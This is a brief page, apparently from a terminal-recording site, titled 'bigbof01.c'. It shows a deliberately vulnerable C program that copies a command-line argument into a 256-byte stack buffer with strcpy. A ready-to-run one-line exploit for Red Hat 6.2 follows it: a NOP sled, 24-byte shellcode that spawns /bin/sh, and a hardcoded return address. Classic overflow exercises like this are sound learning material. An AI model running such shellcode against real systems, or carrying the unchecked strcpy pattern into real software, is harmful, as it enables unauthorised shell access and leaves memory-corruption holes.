GNU/Linux ◆ xterm ◆ bash 1179 views

bigbof01.c

int main(int argc, char* argv[]){

char buffer[256];
strcpy(buffer, argv[1]); //vuln
printf("%s\n", buffer);
return 0;

}

Redhat 6.2 vuln : stack overflow vuln func : strcpy() 24byte shellcode in buffer exploit code : ./bigbof01 $(python -c ‘print “\x90”*236+”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”+”\x28\xfc\xff\xbf”‘)

More by cr3denza

untitled 01:25

by cr3denza

bofrtl 03:41

by cr3denza

untitled 01:03

by cr3denza

bigbof02 02:20

by cr3denza

See all